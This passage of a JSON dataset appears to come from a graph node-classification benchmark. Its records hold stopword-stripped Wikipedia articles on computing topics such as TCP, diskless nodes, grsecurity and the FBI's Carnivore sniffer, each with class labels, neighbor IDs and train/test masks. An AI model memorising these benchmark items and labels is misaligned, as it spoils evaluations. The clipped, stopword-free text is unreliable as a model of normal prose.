subnetwork thereby allowing many ip addresses ports subnet serviced single public-facing address tcp complex protocol however significant enhancements made proposed years basic operation changed significantly since first specification rfc 675 1974 v4 specification rfc 793 published september 1981 rfc 1122 host requirements internet hosts clarified number tcp protocol implementation requirements list 8 required specifications 20 strongly encouraged enhancements available rfc 7414 among list rfc 2581 tcp congestion control one important tcp-related rfcs recent years describes updated algorithms avoid undue congestion 2001 rfc 3168 written describe explicit congestion notification ecn congestion avoidance signaling mechanism original tcp congestion avoidance algorithm known tcp tahoe many alternative algorithms since proposed including tcp reno tcp vegas fast tcp tcp new reno tcp hybla tcp interactive itcp research effort tcp extensions allows applications subscribe tcp events register handler components launch applications various purposes including application-assisted congestion control multipath tcp mptcp ongoing effort within ietf aims allowing tcp connection use multiple paths maximize resource usage increase redundancy redundancy offered multipath tcp context wireless networks enables simultaneous utilization different networks brings higher throughput better handover capabilities multipath tcp also brings performance benefits datacenter environments reference implementation multipath tcp developed linux kernel multipath tcp used support siri voice recognition application iphones ipads macs tcp cookie transactions tcpct extension proposed december 2009 secure servers denial-of-service attacks unlike syn cookies tcpct conflict tcp extensions window scaling tcpct designed due necessities dnssec servers handle large numbers short-lived tcp connections tcpcrypt extension proposed july 2010 provide transport-level encryption directly tcp designed work transparently require configuration unlike tls ssl tcpcrypt provide authentication provides simple primitives application first tcpcrypt ietf draft published implementations exist several major platforms tcp fast open extension speed opening successive tcp connections two endpoints works skipping three-way handshake using cryptographic cookie similar earlier proposal called t/tcp widely adopted due security issues tcp fast open published rfc 7413 2014 proposed may 2013 proportional rate reduction prr tcp extension developed google engineers prr ensures tcp window size recovery close slow-start threshold possible algorithm designed improve speed recovery default congestion control algorithm linux 3.2+ kernels tcp originally designed wired networks packet loss considered result network congestion congestion window size reduced dramatically precaution however wireless links known experience sporadic usually temporary losses due fading shadowing hand interference radio effects strictly congestion erroneous back-off congestion window size due wireless packet loss may congestion avoidance phase conservative decrease window size causes radio link underutilized extensive research combating harmful effects conducted suggested solutions categorized end-to-end solutions require modifications client server link layer solutions radio link protocol rlp cellular networks proxy-based solutions require changes network without modifying end nodes number alternative congestion control algorithms vegas westwood veno santa cruz proposed help solve wireless problem one way overcome processing power requirements tcp build hardware implementations widely known tcp offload engines toe main problem toes hard integrate computing systems requiring extensive changes operating system computer device one company develop device alacritech packet sniffer intercepts tcp traffic network link useful debugging networks network stacks applications use tcp showing user packets passing link networking stacks support so_debug socket option enabled socket using setsockopt option dumps packets tcp states events socket helpful debugging netstat another utility used debugging many applications tcp appropriate one problem least normal implementations application access packets coming lost packet retransmitted copy lost packet received causes problems real-time applications streaming media real-time multiplayer games voice ip voip generally useful get data timely fashion get data order historical performance reasons storage area networks sans use fibre channel protocol fcp fibre channel connections also embedded systems network booting servers serve simple requests huge numbers clients e.g dns servers complexity tcp problem finally tricks transmitting data two hosts behind nat using stun similar systems far simpler without relatively complex protocol like tcp way generally tcp unsuitable user datagram protocol udp used provides application multiplexing checksums tcp handle streams retransmission giving application developer ability code way suitable situation replace methods like forward error correction interpolation stream control transmission protocol sctp another protocol provides reliable stream oriented services similar tcp newer considerably complex tcp yet seen widespread deployment however especially designed used situations reliability near-real-time considerations important venturi transport protocol vtp patented proprietary protocol designed replace tcp transparently overcome perceived inefficiencies related wireless data transport tcp also issues high-bandwidth environments tcp congestion avoidance algorithm works well ad-hoc environments data sender known advance environment predictable timing based protocol asynchronous transfer mode atm avoid tcp retransmits overhead udp-based data transfer protocol udt better efficiency fairness tcp networks high bandwidth-delay product multipurpose transaction protocol mtp/ip patented proprietary software designed adaptively achieve high throughput transaction performance wide variety network conditions particularly tcp perceived inefficient tcp runs ipv4 method used compute checksum defined rfc 793 checksum field 16 bit one complement one complement sum 16-bit words header text segment contains odd number header text octets checksummed last octet padded right zeros form 16-bit word checksum purposes pad transmitted part segment computing checksum checksum field replaced zeros words appropriate padding 16-bit words added using one complement arithmetic sum bitwise complemented inserted checksum field pseudo-header mimics ipv4 packet header used checksum computation shown table source destination addresses ipv4 header protocol value 6 tcp cf list ip protocol numbers tcp length field length tcp header data measured octets tcp runs ipv6 method used compute checksum changed per rfc 2460 pseudo-header mimics ipv6 header computation checksum shown many tcp/ip software stack implementations provide options use hardware assistance automatically compute checksum network adapter prior transmission onto network upon reception network validation may relieve os using precious cpu cycles calculating checksum hence overall network performance increased feature may cause packet analyzers unaware uncertain use checksum offload report invalid checksums outbound packets yet reached network adapter occur packets intercepted transmitted network adapter packets transmitted network adaptor wire valid checksums issue also occur monitoring packets transmitted virtual machines host virtual device driver may omit checksum calculation optimization knowing checksum calculated later vm host kernel physical hardware",
    "neighbors": [
      6146,
      10242,
      5,
      8202,
      8204,
      14,
      19,
      8211,
      10270,
      2079,
      10271,
      2085,
      10283,
      8238,
      2098,
      4158,
      64,
      8265,
      8266,
      10332,
      10341,
      10344,
      10349,
      112,
      2164,
      119,
      4219,
      6273,
      4229,
      6281,
      142,
      4242,
      152,
      2203,
      2205,
      2206,
      10402,
      2213,
      172,
      6318,
      6319,
      2228,
      8386,
      8391,
      4297,
      10444,
      216,
      6364,
      10461,
      8432,
      10486,
      6394,
      2299,
      4349,
      6402,
      4369,
      4370,
      275,
      6422,
      8487,
      6456,
      8504,
      2362,
      2373,
      8523,
      6492,
      349,
      10589,
      361,
      2409,
      367,
      6524,
      2430,
      2431,
      10631,
      6541,
      4504,
      10653,
      8610,
      10659,
      425,
      2476,
      6577,
      8648,
      10696,
      10698,
      2509,
      8664,
      8669,
      8670,
      4577,
      10723,
      10727,
      4589,
      6651,
      10747,
      10748,
      514,
      4616,
      521,
      6681,
      6682,
      6689,
      6694,
      6697,
      6704,
      562,
      4660,
      6712,
      6723,
      2639,
      592,
      4687,
      6735,
      4692,
      609,
      2659,
      10852,
      10853,
      4723,
      4725,
      2679,
      4729,
      2685,
      649,
      2701,
      4778,
      2736,
      2739,
      4793,
      4797,
      702,
      2752,
      708,
      710,
      8905,
      6861,
      718,
      6869,
      6875,
      6877,
      6880,
      2786,
      8933,
      2797,
      751,
      8946,
      755,
      10995,
      6904,
      11001,
      11006,
      4863,
      2827,
      11029,
      8989,
      8998,
      6951,
      9007,
      6964,
      4918,
      823,
      829,
      9021,
      2887,
      849,
      6993,
      6997,
      2904,
      7003,
      11104,
      11105,
      871,
      11112,
      7017,
      2922,
      2934,
      7031,
      11126,
      891,
      2947,
      4999,
      904,
      11158,
      2970,
      2971,
      7067,
      933,
      2983,
      9127,
      941,
      942,
      2994,
      2996,
      5045,
      953,
      9146,
      3005,
      3006,
      7102,
      961,
      11210,
      3019,
      5071,
      9167,
      979,
      7135,
      5102,
      11249,
      5113,
      5118,
      11269,
      1030,
      3094,
      5146,
      11292,
      9251,
      7208,
      5166,
      7214,
      9265,
      5173,
      9269,
      11319,
      11321,
      3133,
      5181,
      11332,
      7257,
      5222,
      5241,
      11387,
      5251,
      5254,
      5257,
      9356,
      3218,
      9365,
      11413,
      9372,
      9380,
      9381,
      1197,
      7343,
      1200,
      9393,
      9399,
      7364,
      11464,
      3273,
      1229,
      7391,
      9440,
      3297,
      11487,
      1256,
      1266,
      3322,
      1285,
      1297,
      1304,
      5402,
      5405,
      9511,
      11566,
      5437,
      11591,
      1363,
      11606,
      5468,
      5469,
      5470,
      5471,
      5472,
      3428,
      3437,
      7535,
      11647,
      7554,
      1411,
      3472,
      3473,
      7570,
      5531,
      3503,
      5559,
      9670,
      3540,
      5589,
      9692,
      3558,
      3564,
      3580,
      9725,
      3581,
      9727,
      7683,
      1541,
      3592,
      1556,
      5652,
      1563,
      1580,
      1586,
      9779,
      7761,
      1618,
      5714,
      9824,
      9834,
      3695,
      5749,
      1661,
      9860,
      7817,
      9868,
      3734,
      3742,
      3744,
      3750,
      3751,
      3752,
      3755,
      9909,
      7863,
      5817,
      3770,
      7865,
      5843,
      9939,
      7895,
      1754,
      3813,
      3820,
      5875,
      9981,
      1792,
      9987,
      3847,
      1808,
      5906,
      10005,
      3872,
      10016,
      1835,
      7984,
      10035,
      7991,
      8000,
      10058,
      1867,
      10060,
      1876,
      3939,
      1893,
      10115,
      10124,
      3983,
      10144,
      10147,
      10171,
      8161,
      4071,
      4084,
      4085,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 10925,
    "label": 1,
    "text": "Data_access_layer:data access layer data access layer dal computer software layer computer program provides simplified access data stored persistent storage kind entity-relational database acronym prevalently used microsoft environments example dal might return reference object terms object-oriented programming complete attributes instead row fields database table allows client user modules created higher level abstraction kind model could implemented creating class data access methods directly reference corresponding set database stored procedures another implementation could potentially retrieve write records file system dal hides complexity underlying data store external world example instead using commands insert delete update access specific table database class stored procedures could created database procedures would called method inside class would return object containing requested values insert delete update commands could executed within simple functions like registeruser loginuser stored within data access layer also business logic methods application mapped data access layer example instead making query database fetch users several tables application call single method dal abstracts database calls applications using data access layer either database server dependent independent data access layer supports multiple database types application becomes able use whatever databases dal talk either circumstance data access layer provides centralized location calls database thus makes easier port application database systems assuming 100 database interaction done dal given application object-relational mapping tools provide data layers fashion following active record model orm/active-record model popular web frameworks",
    "neighbors": [
      7175,
      9481,
      4490,
      10737,
      9075,
      2901
    ],
    "mask": "Train"
  },
  {
    "node_id": 10926,
    "label": 7,
    "text": "Diskless_node:diskless node diskless node diskless workstation workstation personal computer without disk drives employs network booting load operating system server computer may also said act diskless node disks unused network booting used diskless nodes computers acting sometimes known network computers hybrid clients hybrid client may either mean diskless node may used particular sense mean diskless node runs applications remotely thin client computing architecture advantages diskless nodes include lower production cost lower running costs quieter operation manageability advantages example centrally managed software installation many universities large organizations pcs used similar configuration applications stored remotely executed locally—again manageability reasons however diskless nodes still boot local hard drive diskless nodes process data thus using cpu ram run software store data persistently—that task handed server distinct thin clients significant processing happens remotely server—the software runs thin client thin i.e relatively small simple client software handles simple input/output tasks communicate user drawing dialog box display waiting user input collective term encompassing thin client computing technological predecessor text terminals text-only centralized computing thin clients text terminals require powerful central processing facilities servers order perform significant processing tasks clients diskless nodes seen compromise fat clients ordinary personal computers centralized computing using central storage efficiency requiring centralized processing making efficient use powerful processing power even slowest contemporary cpus would tend sit idle much time centralized computing model operating system os diskless node loaded server using network booting cases removable storage may used initiate bootstrap process usb flash drive bootable media floppy disk cd dvd however firmware many modern computers configured locate server begin bootup process automatically without need insert bootable media network auto-booting preboot execution environment pxe bootstrap protocol bootp network protocols commonly used find server files booting device standard full-size desktop pcs able network-booted manner add-on network card includes undi boot rom diskless network booting commonly built-in feature desktop laptop pcs intended business use since used otherwise disk-booted standard desktop computer remotely run diagnostics install software apply disk image local hard drive bootstrapping process initiated described bootstrapping take place according one three main approaches windows 3.x windows 95 osr1 supported remote boot operations netware servers windows nt servers even dec pathworks servers third party software vendors qualystem acquired neoware lanworks acquired 3com ardence acquired citrix apct xtreamining technology developed marketed software products aimed remote-boot newer versions windows product line windows 95 osr2 windows 98 supported qualystem lanworks windows nt supported apct ardence called venturcom time windows 2000/xp/2003/vista/windows 7 supported hewlett packard acquired neoware previously acquired qualystem citrix systems acquired ardence essentially single os image array machines perhaps customizations differences hardware configurations among nodes installing software maintaining installed software efficient furthermore system changes made operation due user action worms viruses etc either wiped power removed image copied local ram disk windows xp embedded remote boot prohibited entirely image network filesystem allows use public access areas libraries schools etc. users might wish experiment attempt hack system however necessary implement network booting achieve either advantages ordinary pcs help appropriate software configured download reinstall operating systems e.g nightly basis extra work compared using shared disk image diskless nodes boot modern diskless nodes share disk image using 1 n relationship 1 disk image used simultaneously n diskless nodes makes easy install maintain software applications administrator needs install maintain application clients get new application soon boot updated image disk image sharing made possible use write cache client competes writing shared disk image client writes cache modern diskless nodes systems also use 1:1 client-to-diskimage relationship one client owns one disk image writes directly said disk image write cache used making modification shared disk image usually made way use central disk storage also makes efficient use disk storage cut storage costs freeing capital invest reliable modern storage technologies raid arrays support redundant operation storage area networks allow hot-adding storage without interruption means losses disk drives mechanical electrical failure—which statistically highly probable events timeframe years large number disks involved—are often less likely happen typically fewer disk drives fail less likely cause interruption would likely part raid arrays also means nodes less likely hardware failures fat clients diskless nodes share advantages thin clients however storage efficiency come price often happens computing increased storage efficiency sometimes comes price decreased performance large numbers nodes making demands server simultaneously slow everyone experience however mitigated installing large amounts ram server speeds read operations improving caching performance adding servers distributes i/o workload adding disks raid array distributes physical i/o workload case also problem affect client-server network extent since course fat clients also use servers store user data indeed user data may much significant size may accessed far frequently operating systems programs environments moving diskless model necessarily cause noticeable degradation performance greater network bandwidth i.e capacity also used diskless model compared fat client model necessarily mean higher capacity network infrastructure need installed—it could simply mean higher proportion existing network capacity used finally combination network data transfer latencies physically transferring data network contention latencies waiting server process nodes requests lead unacceptable degradation performance compared using local drives depending nature application capacity network infrastructure server another example situation diskless node would useful possibly hazardous environment computers likely damaged destroyed thus making need inexpensive nodes minimal hardware benefit thin clients also used diskless machines may also consume little power make little noise implies potential environmental benefits makes ideal computer cluster applications major corporations tend instead implement thin clients using microsoft windows terminal server software since much lower specification hardware used client essentially acts simple window central server actually running users operating system login session course diskless nodes also used thin clients moreover thin client computers increasing power point becoming suitable fully-fledged diskless workstations applications thin client diskless node architectures employ diskless clients advantages fat clients see differ regard location processing",
    "neighbors": [
      8065,
      9090,
      7555,
      8069,
      7046,
      5384,
      6797,
      5371,
      913,
      3729,
      4241,
      1818,
      543,
      8863,
      9762,
      2339,
      11301,
      2986,
      2731,
      2222,
      7983,
      2996,
      10422,
      823,
      4664,
      4285,
      6464,
      9665,
      7748,
      6597,
      3919,
      9173,
      10325,
      11093,
      2269,
      3166,
      93,
      6624,
      3297,
      7270,
      10481,
      11636,
      1399,
      2811,
      1788,
      1406,
      5375
    ],
    "mask": "Test"
  },
  {
    "node_id": 10927,
    "label": 9,
    "text": "IPTSCRAE:iptscrae iptscrae stack-oriented scripting language used give additional functionality palace software servers name comes pronunciation script pig latin language created jim bumgardner turn inspired forth another stack-based language bumgardner chose style language extremely easily implement interpreter since need support parenthetical groupings operator precedence idea name iptscrae borrowed bumgardner former colleague mentor kevin bjorke came name orthfay freeware forth interpreter 1983 bumgardner originally created iptscrae idaho in-house multi-media authoring system similar hypercard created employee warner new media reused modified iptscrae compiler palace project developed 1994 although scripting language many used provide additional functionality many programs functions forums created iptscrae embedding javascript many factions iptscrae fans done past fully possible implement iptscrae languages even 're dynamic principles example iptscrae past webbed together java javascript html artificial languages including scripting languages programming languages specification languages query languages markup languages add end-user interactions commands programs without sacrificing user-friendliness past years iptscrae even utilized computer peer groups open-source language compilers using transformation hardware description languages also combining several genres computer languages create intertwined web user-friendliness application compatibility following solution classic programmer job interview exercise fizzbuzz implemented iptscrae ..or one-line direct input",
    "neighbors": [
      3904,
      3462,
      2374,
      8262,
      5677,
      9780,
      3159,
      987
    ],
    "mask": "Test"
  },
  {
    "node_id": 10928,
    "label": 4,
    "text": "Carnegie_Mellon_CyLab:carnegie mellon cylab carnegie mellon cylab security privacy institute computer security research center carnegie mellon university founded 2003 university-wide research center involves 50 faculty 100 graduate students different departments schools within university one largest university-based cyber security research education centers u.s. cylab works cert coordination center well us-cert matters relating cybersecurity institute often cited security privacy research cylab website",
    "neighbors": [
      2464,
      3528,
      7337,
      4081,
      4722,
      8086,
      5341,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10929,
    "label": 7,
    "text": "Netronome:netronome netronome privately held fabless semiconductor company specializing design network flow processors used intelligent flow processing network communications devices switches routers cyber security applications netronome founded 2003 niel viljoen david wells johann tönsing previously worked marconi niel viljoen served chief technology officer marconi general manager fore systems acquired marconi 4.6 billion 1999 viljoen served ceo president netronome 2003 2011 february 2011 2013 howard bubb stepped chief executive officer however july year viljoen took ceo november 2007 netronome announced technology licensing sales marketing agreement intel corporation focused extension intel ixp28xx product line network processors terms agreement netronome developing next-generation line ixp-compatible high-end network processors combine intel ixp28xx technology netronome architecture march 2010 netronome announced began shipping network flow processor nfp–3240 specifically designed tight coupling x86 architectures january 2016 netronome announced agilio family server-based networking solutions",
    "neighbors": [
      4194,
      6268
    ],
    "mask": "Test"
  },
  {
    "node_id": 10930,
    "label": 3,
    "text": "Phantasie_II:phantasie ii phantasie ii second video game phantasie series 1986 ssi published next part phantasie series phantasie ii dark lord nikademus nemesis time nikademus fashioned evil orb cast curse beautiful island named ferronrah enslaved people player mission find destroy orb phantasie ii used graphics fighting original phantasie game one improvement combat ability character class target enemy rank thrown rock improvements complexity quests little done innovate series one option endeared many veterans ability transfer characters phantasie sequel manual included phantasie ii identical one included phantasie plus small card explaining differences computer gaming world noted advantageous terms players original would easier time getting game disadvantageous particularly tedious mechanisms games particularly infamous distribution selling rigamarole review continued note characters imported original equipment removed well gold experience affording slight head start newly created characters phantasie ii sold 30,100 copies compute 1986 recommended seeking traditional role-playing game ssi rings zilfin enjoyed phantasie scorpia criticized phantasie ii changing predecessor infamous distribution selling rigamarole including bug handling money magazine concluded although flawed certain aspects phantasie ii interesting overall good game rpg type recommended fans first game reviewing atari st version antic 1987 liked lack disk-based copy protection permadeath magazine concluded phantasie ii fun play spend much time solving puzzles antic also approved atari 8-bit version praising practically transparent user interface concluded phantasie ii fine addition anyone software library must adventurers",
    "neighbors": [
      8062
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10931,
    "label": 3,
    "text": "List_of_MSX_games:list msx games following incomplete list video games msx msx2 msx2+ msx turbo r home computers games released system",
    "neighbors": [
      8193,
      3074,
      9219,
      2565,
      4102,
      8199,
      4109,
      4115,
      8223,
      5152,
      33,
      9247,
      1060,
      3622,
      1063,
      8232,
      3113,
      9254,
      10287,
      2096,
      11311,
      6196,
      1084,
      1596,
      2622,
      1599,
      4164,
      2121,
      7758,
      5712,
      2642,
      4690,
      9812,
      4181,
      5717,
      9303,
      10328,
      1626,
      9310,
      3679,
      4705,
      10339,
      4709,
      7782,
      10855,
      616,
      8809,
      9322,
      8300,
      625,
      2674,
      627,
      5746,
      7283,
      8819,
      8823,
      4216,
      5753,
      9849,
      11380,
      2173,
      126,
      8830,
      9853,
      1153,
      5762,
      6792,
      6793,
      8840,
      5263,
      145,
      7314,
      4758,
      4759,
      1693,
      11421,
      8355,
      6824,
      11443,
      181,
      4278,
      8887,
      5820,
      9917,
      703,
      1220,
      3268,
      5828,
      2249,
      1226,
      5839,
      4818,
      5333,
      11478,
      8407,
      4312,
      6872,
      5851,
      5340,
      4317,
      3806,
      5854,
      1248,
      8415,
      2792,
      4328,
      3307,
      1773,
      8942,
      1265,
      6387,
      4856,
      8953,
      5882,
      11518,
      768,
      6400,
      770,
      11522,
      6404,
      4357,
      9998,
      3346,
      279,
      4375,
      10010,
      11557,
      10534,
      2347,
      6956,
      9005,
      5422,
      9006,
      9516,
      10544,
      11053,
      6452,
      4405,
      5942,
      11061,
      11575,
      5436,
      320,
      4418,
      3396,
      8010,
      10064,
      10576,
      4946,
      10066,
      11096,
      4443,
      861,
      8542,
      9566,
      8034,
      3436,
      10093,
      10605,
      387,
      11139,
      9093,
      5001,
      907,
      2956,
      11148,
      8081,
      11666,
      919,
      9120,
      1441,
      5538,
      4518,
      5544,
      4524,
      5548,
      952,
      7610,
      9658,
      445,
      958,
      6077,
      2498,
      10178,
      4551,
      10695,
      9161,
      9674,
      3020,
      6096,
      3543,
      986,
      6109,
      3039,
      481,
      994,
      5091,
      7651,
      11238,
      9703,
      10217,
      1002,
      2540,
      4077,
      4588,
      2032,
      498,
      4082,
      9716,
      1527,
      10234,
      4093,
      7679
    ],
    "mask": "None"
  },
  {
    "node_id": 10932,
    "label": 4,
    "text": "INOC-DBA:inoc-dba inoc-dba inter-network operations center dial-by-asn hotline phone system global voice telephony network deployed managed packet clearing house connects network operations centers security incident response teams critical internet infrastructure providers backbone carriers internet service providers internet exchanges well critical individuals within policy regulatory internet governance security vendor communities inoc-dba closed system ensuring secure authenticated communications uses combination redundant directory services direct peer-to-peer communications stations create resilient high-survivability network carries routine operational traffic emergency-response traffic inoc-dba network uses ietf-standard sip voice ip protocols ensure interoperability thousands users dozens different station switch devices inoc-dba first telephone network kind provide service seven continents",
    "neighbors": [
      10271
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10933,
    "label": 2,
    "text": "Grsecurity:grsecurity grsecurity set patches linux kernel emphasize security enhancements patches typically used computer systems accept remote connections untrusted locations web servers systems offering shell access users grsecurity provides collection security features linux kernel including address space protection enhanced auditing process control grsecurity produced open source security inc. headquartered pennsylvania since april 2017 patches available paying customers major component bundled grsecurity pax among features patch flags data memory stack example non-executable program memory non-writable aim prevent memory overwritten help prevent many types security vulnerabilities buffer overflows pax also provides address space layout randomization aslr randomizes important memory addresses reduce probability attacks rely easily predicted memory addresses another notable component grsecurity provides full role-based access control rbac system rbac intended restrict access system normally provided unix access control lists aim creating fully least-privilege system users processes absolute minimum privileges work correctly nothing way system compromised ability attacker damage gain sensitive information system drastically reduced rbac works collection roles role individual restrictions roles restrictions form access policy amended needed list rbac features grsecurity restricts chroot variety ways prevent various vulnerabilities privilege escalation attacks well add additional checks among things configured audit specific group users mounting/unmounting devices changes system time date codice_14 logging audit types allow administrator also log denied resource attempts failed codice_15 attempts ipc creation removal codice_16 logging together arguments trusted path execution another optional feature used prevent users executing binaries owned root user world-writable binaries useful prevent users executing malicious binaries accidentally executing world-writable system binaries could modified malicious user grsecurity also hardens way chroot jails work chroot jail used isolate particular process rest system used minimise potential damage service compromised ways break chroot jail grsecurity attempts prevent also features increase security prevent users gaining unnecessary knowledge system restricting codice_17 codice_18 commands root user list additional features security improvements grsecurity patches never submitted inclusion mainline linux kernel following reasons access grsecurity stable patches restricted bruce perens speculated blog post using patches obtained oss inc. stable patch access agreement according perens adds term gpl prohibiting distribution creating penalty distribution may expose clients legal risk copyright infringement brad spengler open source security inc. sued defamation lost district court directed pay bruce perens legal team almost 260,000 presently case process appeal",
    "neighbors": [
      10756,
      4616,
      3082,
      5139,
      10780,
      10785,
      3618,
      6180,
      8242,
      9266,
      5176,
      4161,
      10817,
      8772,
      6213,
      2118,
      8268,
      589,
      593,
      10333,
      1122,
      10851,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      642,
      7812,
      8326,
      10378,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      5815,
      700,
      5822,
      5824,
      1736,
      2762,
      9930,
      8909,
      6352,
      210,
      8410,
      10971,
      4831,
      8928,
      225,
      1761,
      2278,
      233,
      4841,
      7403,
      10482,
      2294,
      8439,
      2809,
      7938,
      4360,
      1291,
      4367,
      1813,
      792,
      10016,
      295,
      7983,
      11568,
      823,
      6968,
      7992,
      318,
      3911,
      4423,
      6988,
      8012,
      10063,
      5975,
      11095,
      5472,
      10091,
      5492,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      8106,
      4011,
      9646,
      1456,
      1972,
      9660,
      1474,
      451,
      9667,
      5573,
      457,
      5067,
      4562,
      8147,
      2529,
      6625,
      4067,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 10934,
    "label": 9,
    "text": "Pat_Fothergill:pat fothergill ann patricia pat fothergill née waddington formerly ambler 13 february 1936 – 28 january 2017 pioneer robotics robot control languages ai department university edinburgh moved university aberdeen 1986 join department computing senior lecturer remained death pat fothergill born woodford wells essex england 1936 early childhood family moved singapore south africa accommodate father career civil engineer attended dorking county grammar school prefect received governors prize academic achievements excelled math science studying pure mathematics applied mathematics physics chemistry a-level exams received distinction pure mathematics state scholarship uk ministry education attend newnham college cambridge cambridge studied natural sciences tripos specialising chemistry physics biological chemistry mathematics also studied archaeological anthropological tripos graduated ba 1957 1961 following graduation fothergill remained cambridge first husband richard ambler graduate student biological sciences worked information officer organic chemistry department alexander r. todd joined ai laboratory university edinburgh 1968 research scientist helped develop robot command language rapt worked robin popplestone rod burstall amongst others whilst aberdeen pat co-authored paper wpfm workspace prediction fast matching algorithm jonathan c aylett robert b fisher later included john e. w. mayhew john p. frisby 3d model recognition stereoscopic cues",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10935,
    "label": 4,
    "text": "Carnivore_(software):carnivore software carnivore later renamed dcs1000 system implemented federal bureau investigation fbi designed monitor email electronic communications used customizable packet sniffer monitor target user internet traffic carnivore implemented october 1997 2005 replaced improved commercial software carnivore grew earlier fbi project called omnivore replaced older surveillance tool migrated us navy fbi director integrity compliance patrick w. kelley still undisclosed name september 1998 fbi data intercept technology unit ditu quantico virginia launched project migrate omnivore sun solaris operating system windows nt platform done facilitate miniaturization system support wider range personal computer pc equipment migration project called phiple troenix resulting system named carnivore carnivore system microsoft windows-based workstation packet-sniffing software removable jaz disk drive computer must physically installed internet service provider isp location sniff traffic lan segment look email messages transit technology highly advanced—it used standard packet sniffer straightforward filtering critical components operation filtering criteria accurately match appropriate subject elaborate content model developed independent technical review carnivore justice department prepared 2000 several groups expressed concern regarding implementation usage possible abuses carnivore july 2000 electronic frontier foundation submitted statement subcommittee constitution committee judiciary united states house representatives detailing dangers system electronic privacy information center also made several releases dealing fbi countered concerns statements highlighting target-able nature carnivore assistant fbi director donald kerr quoted saying carnivore device works much like commercial sniffers network diagnostic tools used isps every day except provides fbi unique ability distinguish communications may lawfully intercepted may example court order provides lawful interception one type communication e.g. e-mail excludes communications e.g. online shopping carnivore tool configured intercept e-mails transmitted either named subject ... specialized network analyzer sniffer runs application program normal personal computer microsoft windows operating system works sniffing proper portions network packets copying storing packets match finely defined filter set programmed conformity court order filter set extremely complex provides fbi ability collect transmissions comply pen register court orders trap trace court orders title iii interception orders etc ... ... important distinguish meant sniffing problem discriminating users messages internet complex one however exactly carnivore search contents every message collect contain certain key words like bomb drugs selects messages based criteria expressly set court order example messages transmitted particular account particular user prolonged negative coverage press fbi changed name system carnivore benign-sounding dcs1000 dcs reported stand digital collection system system functions associated press reported mid-january 2005 fbi essentially abandoned use carnivore 2001 favor commercially available software narusinsight mass surveillance system report 2007 described successor system located inside internet provider network junction point router network switch capable indiscriminately storing data flowing provider network",
    "neighbors": [
      1930,
      6797,
      3088,
      1169,
      4625,
      9233,
      3354,
      1189,
      3495,
      1064,
      9665,
      6344,
      4937,
      7759,
      7887,
      7893,
      5986,
      2162,
      4595,
      6643,
      5749,
      8564,
      3703,
      10872,
      9983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10936,
    "label": 4,
    "text": "SekChek_Local:sekchek local sekchek security audit benchmarking toolset dating 1996 sekchek formed former auditors deloitte touche 1996 toolset set automated processes analyze logical security profile computer.. 20 march 2018 sekcheck website gave notice operations would cease 31 may 2018 reasons cited included sekcheks business model less relevant business environment 2018 surge compliance regulatory requirements including gdpr monetary difficulties due losses insolvency credit-card processor sekchek classic product gathered information host would sent encrypted sekchek report processing enable checking security policies correctly configured originally worked as/400 number platforms extended next two years encompass ed windows netware unix reports anonymously compared machines average similar industry computers company introduced local version product 2008 avoided need send data off-site windows utility specifically audit active directory ad domain level rather server level analyzed sam tool product initially marketed security evaluator noted providing comprehensive reports security vulnerability computer system",
    "neighbors": [
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10937,
    "label": 6,
    "text": "Virtual_device:virtual device virtual device unix file codice_1 codice_2 treated device far user level software concerned generated kernel without reference hardware instance codice_3 written kernel tells program wrote everything without actually writing anywhere read reading program told reached end file device file made mknod instance reference hardware dos- windows- os/2-like operating systems define nul device performs similar function implemented part file name processing – actual file exists name",
    "neighbors": [
      2184,
      6797,
      7983,
      5492,
      1147
    ],
    "mask": "Train"
  },
  {
    "node_id": 10938,
    "label": 8,
    "text": "Semantic_service-oriented_architecture:semantic service-oriented architecture semantic service oriented architecture ssoa architecture allows scalable controlled enterprise application integration solutions ssoa describes sophisticated approach enterprise-scale infrastructure leverages rich machine-interpretable descriptions data services processes enable software agents autonomously interact perform critical mission functions ssoa technically founded three notions ssoa combines implements computer science concepts robust extensible architecture capable enabling complex powerful functions health care industry ssoa hl7 long implemented protocols include loinc phin hipaa related standards series ssoa-related iso standards published financial services found iso website financial sectors also adopt emv standards facilitate european consumers part ssoa transport trade iso sections 03.220.20 35.240.60 general guidelines technology standards fields partially located 25.040.40 35.240.99",
    "neighbors": [
      4107,
      10004,
      5525,
      8471,
      11674,
      9248,
      5413,
      53,
      6330,
      4797,
      5449,
      10452,
      2901,
      9941,
      6360,
      479,
      6629,
      3052,
      4847,
      119,
      5370
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10939,
    "label": 8,
    "text": "WIMP_(software_bundle):wimp software bundle acronym wimp solution stack software partially free open source software used run dynamic web sites servers expansion follows microsoft web platform installer tool install applications wimp-system lamp similar stack entirely free software linux replacing windows apache http server replacing iis wamp similar stack apache replacing iis",
    "neighbors": [
      225,
      865,
      8419,
      8644,
      8262,
      8582,
      4010,
      8554,
      6797,
      7022,
      7983,
      119,
      11030,
      4439
    ],
    "mask": "Test"
  },
  {
    "node_id": 10940,
    "label": 4,
    "text": "Security_information_management:security information management security information management sim information security industry term collection data log files central repository trend analysis sim products generally software agents running computer systems monitored send log information centralized server acting security console console typically displays reports charts graphs information often real time software agents incorporate local filters reduce manipulate data send server although typically forensic point view would collect audit accounting logs ensure recreate security incident security console monitored administrator reviews consolidated information takes action response alerts issued data sent server correlated analyzed normalized software agents common form usually xml data aggregated order reduce overall size terminology easily mistaken reference whole aspect protecting one infrastructure computer security breach due historic reasons terminology evolution sim refers part information security consists discovery 'bad behavior using data collection techniques term commonly used represent entire security infrastructure protects environment commonly called information security management infosec security information management also referred log management different sem security event management makes portion siem security information event management solution",
    "neighbors": [
      10717,
      9488,
      8533,
      11611,
      5373,
      2558,
      479
    ],
    "mask": "Test"
  },
  {
